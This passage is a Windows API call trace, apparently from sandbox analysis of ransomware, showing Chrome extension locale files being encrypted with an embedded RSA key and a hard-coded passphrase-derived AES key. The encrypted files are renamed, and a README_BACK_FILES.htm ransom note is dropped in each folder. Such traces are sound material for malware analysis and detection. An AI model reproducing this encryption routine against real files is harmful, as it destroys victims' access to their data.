hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.899] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.899] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.899] GetLastError () returned 0x0 [0251.899] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json")) returned 0x20 [0251.899] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0251.900] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.900] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.902] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.903] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.905] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.905] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.905] CryptHashData (hHash=0x2984420, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.905] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984420, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29841a0) returned 1 [0251.905] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.905] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.905] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298ab68) returned 1 [0251.906] CryptImportPublicKeyInfo (in: hCryptProv=0x298ab68, dwCertEncodingType=0x1, pInfo=0x29914c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29914f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29914f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29843a0) returned 1 [0251.906] CryptEncrypt (in: hKey=0x29843a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.906] CryptEncrypt (in: hKey=0x29843a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b360*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b360*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.906] WriteFile (in: hFile=0x5d64, lpBuffer=0x298b360*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b360*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.907] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.909] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.909] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.909] CloseHandle (hObject=0x5d5c) returned 1 [0251.909] CloseHandle (hObject=0x5d64) returned 1 [0251.909] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0251.913] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0251.914] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.gsg")) returned 1 [0251.915] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.fuck")) returned 1 [0251.916] CryptDestroyHash (hHash=0x2984420) returned 1 [0251.916] CryptDestroyKey (hKey=0x29841a0) returned 1 [0251.916] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.916] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.916] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.917] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0251.917] AreFileApisANSI () returned 1 [0251.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.917] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.917] GetFileType (hFile=0x5d60) returned 0x1 [0251.918] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.919] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.919] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.919] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.919] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.919] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.919] GetLastError () returned 0x0 [0251.919] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json")) returned 0x20 [0251.920] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0251.921] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.921] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.922] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.922] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.925] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.925] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.925] CryptHashData (hHash=0x29843e0, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.925] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29843e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984560) returned 1 [0251.925] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.925] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.925] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a728) returned 1 [0251.926] CryptImportPublicKeyInfo (in: hCryptProv=0x298a728, dwCertEncodingType=0x1, pInfo=0x2992910*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992940*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992948*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984420) returned 1 [0251.926] CryptEncrypt (in: hKey=0x2984420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.926] CryptEncrypt (in: hKey=0x2984420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ac78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ac78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.926] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298ac78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ac78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.927] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.928] CryptEncrypt (in: hKey=0x2984560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.928] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.928] CloseHandle (hObject=0x5d64) returned 1 [0251.928] CloseHandle (hObject=0x5d5c) returned 1 [0251.929] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0251.933] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0251.933] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0251.934] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0251.935] CryptDestroyHash (hHash=0x29843e0) returned 1 [0251.936] CryptDestroyKey (hKey=0x2984560) returned 1 [0251.936] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.936] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.936] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.936] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0251.936] AreFileApisANSI () returned 1 [0251.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.936] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.937] GetFileType (hFile=0x5d60) returned 0x1 [0251.937] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.938] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.938] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.938] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.938] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.938] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.938] GetLastError () returned 0x0 [0251.939] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json")) returned 0x20 [0251.939] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0251.939] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.940] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.941] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.941] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.944] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.944] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.944] CryptHashData (hHash=0x29846a0, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.944] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984060) returned 1 [0251.944] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, 